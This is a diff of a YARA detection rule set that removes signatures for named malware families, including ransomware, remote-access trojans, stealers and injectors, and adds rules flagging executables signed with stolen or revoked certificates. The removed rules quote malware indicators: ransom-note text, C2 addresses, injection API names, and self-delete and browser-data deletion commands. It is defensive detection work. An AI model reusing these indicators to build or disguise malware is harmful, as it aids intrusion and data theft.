+		logic_hash = "e4480ad6ce302a87e38915ef7ba09a94a4626ed359333276b899474f21d46238"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WebClient" fullword ascii
-		$s2 = "DownloadData" fullword ascii
-		$s3 = "packet_server" fullword wide
+		thumbprint = "80986ae0d4f8c8fabf6c4a91550c90224e26205a4ca61c00ff6736dd94817e65"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and filesize < 50KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F8C2E08438Bb0E9Adc955E4B493E5821 : FILE
 {
 	meta:
-		description = "Detects specific downloader injector shellcode"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c5e0946c-3e15-5ebc-b1b5-3f00566dc5cd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "75f505d0-c79a-5eab-a61f-29ec238ac045"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5995-L6015"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1975-L1986"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c13af5fdbb2e8a27103d9502126a82d0bff15d9a269b22e4279b5b459d50e2d"
+		logic_hash = "2258ea96b56acb3025b5b2f39c07d482c375e75323d6f8e8ded91b8dab00656e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "process call create \"%s\"" ascii wide
-		$s2 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\" ascii wide
-		$s3 = "%systemroot%\\system32\\ntdll.dll" ascii wide
-		$s4 = "qemu-ga.exe" ascii wide
-		$s5 = "prl_tools.exe" ascii wide
-		$s6 = "vboxservice.exe" ascii wide
-		$o1 = { 75 04 74 02 38 6e 8b 34 24 83 c4 04 eb 0a 08 81 }
-		$o2 = { 16 f8 f7 ba f0 3d 87 c7 95 13 b7 64 22 be e1 59 }
-		$o3 = { 8b 0c 24 83 c4 04 eb 05 ea f2 eb ef 05 e8 ad fe }
-		$o4 = { eb 05 1d 51 eb f5 ce e8 80 fd ff ff 77 a1 f4 cd }
-		$o5 = { eb 05 6e 33 eb f5 73 e8 64 f6 ff ff 77 a1 f4 77 }
-		$o6 = { 59 eb 05 fd 98 eb f4 50 e8 d5 f5 ff ff 3b b9 00 }
-		$o7 = "bYkoDA7G" fullword ascii
+		thumbprint = "459ef82eb5756e85922a4687d66bd6a0195834f955ede35ae6c3039d97b00b5f"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $o* ) ) or ( all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D2Caf7908Aaebfa1A8F3E2136Fece024 : FILE
 {
 	meta:
-		description = "Detects downloader injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ce2c418d-18e4-579c-9828-94e294385846"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "043a598d-8b84-597f-ac2e-035cc9ccef77"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6017-L6034"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1988-L1999"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "76d185cfcbc7f4996c2fb5c7c1ba4eb20b32d322d8ff47594283a4ca3e573a0b"
+		logic_hash = "2c8a322e687ed575e66ff308bcf0950ab87bc5ac3ab561c8cc3d81e9181ac708"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "In$J$ct0r" fullword wide
-		$x2 = "%InJ%ector%" fullword wide
-		$a1 = "WriteProcessMemory" fullword wide
-		$a2 = "URLDownloadToFileA" fullword ascii
-		$a3 = "Wow64SetThreadContext" fullword wide
-		$a4 = "VirtualAllocEx" fullword wide
-		$s1 = "RunPE" fullword wide
-		$s2 = "SETTINGS" fullword wide
-		$s3 = "net.pipe" fullword wide
-		$s4 = "vsmacros" fullword wide
+		thumbprint = "82baf9b781d458a29469e5370bc9752ebef10f3f8ea506ca6dd04ea5d5f70334"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $a* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" )
 }
-rule DITEKSHEN_MALWARE_Win_Nermer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_003223B4616C2687C04865Bee8321726A8 : FILE
 {
 	meta:
-		description = "Detects Nermer ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fce4f178-8e98-53b0-ae09-2ce876ad524e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "05320823-08e5-58f4-896c-ae7f01b40a3b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6036-L6062"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2001-L2012"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e885b1b908b256ee07f5cb144d63f5ad65e5bf746b70efe168b0ac742a246ab3"
+		logic_hash = "671e3a589fb24a6c5e38126df45a4767815eff32014172930cab6ffbe135af81"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "gPROTECT_INFO.TXT" fullword wide
-		$x2 = ".nermer" fullword wide
-		$s1 = "db_journal" fullword wide
-		$s2 = "quicken2015backup" fullword wide
-		$s3 = "mysql" fullword wide
-		$s4 = "sas7bdat" fullword wide
-		$s5 = "httpd.exe" fullword wide
-		$s6 = "Intuit.QuickBooks.FCS" fullword wide
-		$s7 = "convimage" fullword wide
-		$s8 = ".?AV?$_Binder@U_Unforced@std@@P8shares_t@" ascii
-		$s9 = "BgIAAACkAABSU0ExAAgAAAEAAQCt" ascii
-		$m1 = "YOUR FILES WERE ENCRYPTED" ascii
-		$m2 = "MARKED BY EXTENSION .nermer" ascii
-		$m3 = "send us your id: >> {id} <<" ascii
-		$m4 = "email us: >> {email} <<" ascii
-		$c1 = "/repeater.php" ascii
-		$c2 = "HTTPClient/0.1" fullword ascii
-		$c3 = "94.156.35.227" ascii
-		$c4 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword ascii
+		thumbprint = "321218e292c2c489bbc7171526e1b4e02ef68ce23105eee87832f875b871ed9f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $c* ) or all of ( $s* ) or ( 4 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $m* ) or 2 of ( $c* ) ) ) or 14 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" )
 }
-rule DITEKSHEN_MALWARE_Win_Beastdoor : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : FILE
 {
 	meta:
-		description = "Detects Beastdoor backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b271d53e-2693-5a93-825a-ef32f72a4b01"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5e926cb1-efd0-5f9d-9327-341bb2f1a5f5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6064-L6084"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2014-L2025"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9a72717d124bcf1e3b95850cd524e577abe96a094586a5555faadba78fcb9ad"
+		logic_hash = "312d810386aebb509ffbd09d6b1ad6a761a03bc07ba5e4a158235786063389a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "shellx.pif" fullword ascii nocase
-		$s2 = "Beasty" fullword ascii
-		$s3 = "* Boot:[" ascii
-		$s4 = "^ Shut Down:[" ascii
-		$s5 = "set cdaudio door" ascii
-		$s6 = "This \"Portable Network Graphics\" image is not valid" wide
-		$n1 = ".aol.com" ascii
-		$n2 = "web.icq.com" ascii
-		$n3 = "&fromemail=" fullword ascii
-		$n4 = "&subject=" fullword ascii
-		$n5 = "&Send=" fullword ascii
-		$n6 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword ascii
-		$n7 = "mirabilis.com" ascii
+		thumbprint = "be226576c113cd14bcdb67e46aab235d9257cd77b826b0d22a9aa0985bad5f35"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" )
 }
-rule DITEKSHEN_MALWARE_Win_Gravityrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3696883055975D571199C6B5D48F3Cd5 : FILE
 {
 	meta:
-		description = "Detects GravityRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cb581dd6-15b2-54ae-9f27-30ec21554fb9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8af62be2-488f-5474-b674-73bf157dff00"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6086-L6108"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2027-L2038"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a6b049dbf21f22f751c15da98536e9ef2a4ced7755ade0cc9904afddef1d3ae6"
+		logic_hash = "9232413a071a6100ba806b1fad2cd6cd2bb85351c36ad25cfc31b66ad041d686"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/GX/GX-Server.php?VALUE=2&Type=" wide
-		$s2 = "&SIGNATUREHASH=" wide
-		$s3 = "Error => CommonFunctionClass => Upload()" wide
-		$s4 = "/GetActiveDomains.php" wide
-		$s5 = "DetectVM" ascii wide
-		$s6 = "/c {0} > {1}" wide
-		$s7 = "DRIVEUPLOADCOMPLETED => TOTALFILES={0}, FILESUPLOADED={1}" wide
-		$s8 = "Program => RunAFile()" wide
-		$s9 = "DoViaCmd" ascii
-		$s10 = ".msoftupdates.com:" wide
-		$f1 = "<RootJob>b__" ascii
-		$f2 = "<GetFiles>b__" ascii
-		$f3 = "<UpdateServer>b__" ascii
-		$f4 = "<EthernetId>b__" ascii
-		$f5 = "<MatchMacAdd>b__" ascii
+		thumbprint = "933749369d61bebd5f2c63ff98625973c41098462d9732cffaffe7e02823bc3a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $f* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" )
 }
-rule DITEKSHEN_MALWARE_Win_Fatalrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aff762E907F0644E76Ed8A7485Fb12A1 : FILE
 {
 	meta:
-		description = "Detects FatalRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f9d0c5dd-ae69-512d-a260-01b9765e10eb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "92113fc4-ef5b-5e86-bc8e-baf342ddf276"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6110-L6128"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2040-L2051"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb7f6822aa4ef98e77670d276d06c9a37718bce38d32ce5b53fe67513b107fbe"
+		logic_hash = "0be4642f6aaf2183d593240efcc8c2046970d3806a67ff53ca4ce7ee85df90e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "XXAcQbcXXfRSScR" fullword ascii
-		$s1 = "CHROME_NO_DATA" fullword ascii
-		$s2 = "CHROME_UNKNOW" fullword ascii
-		$s3 = "-Thread running..." ascii
-		$s4 = "InetCpl.cpl,ClearMyTracksByProcess" ascii nocase
-		$s5 = "MSAcpi_ThermalZoneTemperature" ascii nocase
-		$s6 = "taskkill /f /im rundll32.exe" fullword ascii nocase
-		$s7 = "del /s /f %appdata%\\Mozilla\\Firefox" ascii nocase
-		$s8 = "\\\\%s\\C$\\" ascii
-		$s9 = "fnGetChromeUserInfo" fullword ascii
-		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" fullword ascii
+		thumbprint = "7b0c55ae9f8f5d82edbc3741ea633ae272bbb2207da8e88694e06d966d86bc63"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" )
 }
-rule DITEKSHEN_MALWARE_Win_Wingo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5B440A47E8Ce3Dd202271E5C7A666C78 : FILE
 {
 	meta:
-		description = "Detects malicious Golang executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bc0c84d6-7ea1-5234-89f6-98337900e044"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "62c9a37c-e4dd-5925-a019-08bf6a77476d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6130-L6141"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2053-L2064"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "423b1631ad625fd46a9d10f0ecdf24931cf62a2c1694da3ebdd38daad0a4f724"
+		logic_hash = "f898a3495e173d85fd62598da87ab15cbee0674519231a5e770204a4db3cd93f"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID:" ascii
-		$s2 = /main\.[a-z]{9}Delete/ fullword ascii
-		$s3 = /main\.[a-z]{9}Update/ fullword ascii
-		$s4 = /main\.[a-z]{9}rundll/ fullword ascii
+		thumbprint = "07e4cbdd52027e38b86727e88b33a0a1d49fe18f5aee4101353dd371d7a28da5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of them and #s2 > 2 and #s3 > 2 and #s4 > 2 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" )
 }
-rule DITEKSHEN_MALWARE_Win_GENERIC03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fe41941464B9992A69B7317418Ae8Eb7 : FILE
 {
 	meta:
-		description = "Detects unknown malicious executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "aa0a720d-8215-58d8-b3ce-98d50318cbf9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "44626304-7f68-5d3a-81b4-91ee0bd09cc3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6143-L6154"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2066-L2077"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9166808a3dab80d9d85b3b976ae658160c8389c7d0e05a46d553b5bb9d41a1cb"
+		logic_hash = "713a2cfc95b83de71064e198b26b716790c7cf21674961720695ab6749cb2ad1"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "lbroscfg.dll" wide
-		$s2 = "cmd /c ping 127.0.0.1 & del /f /q \"" fullword wide
-		$s3 = "E:\\Data\\Sysceo\\AD\\" fullword ascii
-		$s4 = "C++\\Browser_noime\\" ascii
+		thumbprint = "ef4da71810fb92e942446ee1d9b5f38fea49628e0d8335a485f328fcef7f1a20"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" )
 }
-rule DITEKSHEN_MALWARE_Win_Pandastealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_29128A56E7B3Bfb230742591Ac8B4718 : FILE
 {
 	meta:
-		description = "Detects Panda Stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "099f0a03-6dfd-5ae5-baaf-fe2b66de759d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "58a9e9f1-531b-5dee-aa11-1537838e9d3f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6156-L6172"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2079-L2090"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "23a911bfe14defe8f961068d43bb349b66ee73f8b2f281f2bec1c0ecb8f37b25"
+		logic_hash = "16c9843b5e3edafa64e07626fda494452efa5d0bcaa80d7d80683258c2b9acd4"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\tokens.txt" fullword ascii
-		$s2 = "user.config" fullword ascii
-		$s3 = "Discord\\" ascii
-		$s4 = "%s\\etilqs_" fullword ascii
-		$s5 = "buildSettingGrabber" ascii
-		$s6 = "buildSettingSteam" ascii
-		$s7 = ".?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@" ascii
-		$s8 = "UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr" ascii
-		$s9 = "|| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (" ascii
+		thumbprint = "f9fcc798e1fccee123034fe9da9a28283de48ba7ae20f0c55ce0d36ae4625133"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" )
 }
-rule DITEKSHEN_MALWARE_Win_Gelsemine : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C2Bb11Cfc5E80Bf4E8Db2Ed0Aa7E50C5 : FILE
 {
 	meta:
-		description = "Detects Gelsemine"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f7e9ca53-fc52-5da0-a760-cb09c2544f4f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d22ee868-71a7-52f4-93f3-b04b105fd399"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6174-L6194"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2092-L2103"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8c20efa6f34ee9165fac9f1f2e5eb20830a02016309dfaa5681977e1a8ac6068"
+		logic_hash = "e54eeea70e85396b26fe188b848ef37c619aae5fc909c1a06ad0bc42fb9b0468"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "If any of these steps fails.only pick one of the targets for configuration\"If you want to just get on with it*which also use [ " wide
-		$s2 = "A make implementation+with core modules (please read NOTES.PER_L)2The per_l Text::Template (please read NOTES.PER_L)" wide
-		$s3 = "NOTES.VMS (OpenVMS)!NOTES.WIN (any supported Windows)%NOTES.DJGPP (DOS platform with DJGPP)'NOTES.ANDROID (obviously Android [ND" wide
-		$s4 = "A simple example would be this)which is to be understood as one of these" fullword wide
-		$s5 = "bala bala bala" fullword wide
-		$s6 = "echo FOO" fullword wide
-		$s7 = "?_Tidy@?$basic_string@DU?$char_traits@D@std@@V" ascii
-		$o1 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
-		$o2 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
-		$o3 = { 8b 76 08 2b f0 a1 34 ff 40 00 03 f0 89 35 38 ff }
-		$o4 = { 83 c4 34 c3 8b 4e 20 6a 05 e8 73 10 00 00 8b 76 }
-		$o5 = { 8b 44 24 44 2b d1 03 d0 8b f2 e9 14 ff ff ff 8d }
-		$o6 = { 68 00 06 00 00 6a 00 e8 d3 ff ff ff a2 48 00 41 }
+		thumbprint = "f1044e01ff30d14a3f6c89effae9dbcd2b43658a3f7885c109f6e22af1a8da4b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $o* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rooth Media Enterprises Limited" and pe.signatures [ i ] . serial == "00:c2:bb:11:cf:c5:e8:0b:f4:e8:db:2e:d0:aa:7e:50:c5" )
 }
-rule DITEKSHEN_MALWARE_Win_Gelsevirine : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_040Cc2255Db4E48Da1B4F242F5Edfa73 : FILE
 {
 	meta:
-		description = "Detects Gelsevirine"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "70f0ed08-4e07-5ab3-968e-95059d20a8e9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4673a61f-1c2b-5f92-af28-d55b5d913784"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6224-L6254"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2105-L2116"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "60d41d6d789f1cd2a7040d6535f13c69ea58a489035838f047b886e8f1f37f63"
+		logic_hash = "ade204ebb2bf26515984d20ae459aaea56136acfd37a54abc794969fd05c54ce"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = /64loadpath(xp|sv|7)/ fullword wide
-		$s2 = "{\"Actions\":[]}" fullword wide
-		$s3 = "PlatformsChunk" fullword wide
-		$s4 = "CurrentPluginCategory" fullword wide
-		$s5 = "CurrentOperationPlatform" fullword wide
-		$s6 = "PersistencePlugins" fullword wide
-		$s7 = "memory_library_file" fullword wide
-		$s8 = "LoadPluginBP" fullword ascii
-		$s9 = "GetOperationBasicInformation" fullword ascii
-		$s10 = "commonappdata/Intel/Runtime" wide
-		$s11 = "cfsst x64" fullword wide
-		$s12 = "ForkOperation" fullword ascii
-		$c1 = "domain.dns04.com:8080;domain.dns04.com:443;acro.ns1.name:80;acro.ns1.name:1863;" wide
-		$c2 = "<base64 content=\"" fullword ascii
-		$c3 = "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
-		$m1 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
-		$m2 = "46EBBDC3-EEDC-42D4-BA1D-D454DFCE8E42" ascii wide
-		$m3 = "135054C6-8036-42C7-A97C-31F37D7728BD" ascii wide
-		$m4 = "DC7FDDF7-B2F1-4B99-BE6A-AA683FF11CE6" ascii wide
-		$m5 = "131C8113-E083-4C7F-BEAF-82D73B01F2C5" ascii wide
-		$m6 = "4CCF506D-2F61-4C3A-B9C6-9FA47D43A3FC" ascii wide
-		$m7 = "B2DC745A-66AE-4A19-B11C-AD74D46B7EE0" ascii wide
-		$m8 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
+		thumbprint = "1270a79829806834146ef50a8036cfcc1067e0822e400f81073413a60aa9ed54"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 5 of ( $m* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Softland SRL" and pe.signatures [ i ] . serial == "04:0c:c2:25:5d:b4:e4:8d:a1:b4:f2:42:f5:ed:fa:73" )
 }
-rule DITEKSHEN_MALWARE_Win_Ipsechelper : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : FILE
 {
 	meta:
-		description = "Detects IPsecHelper backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f848ac2a-95ad-596a-b193-5cfb424e33a2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "decdae98-333f-58b3-8c48-b997da5fc3f3"
+		date = "2024-10-04"
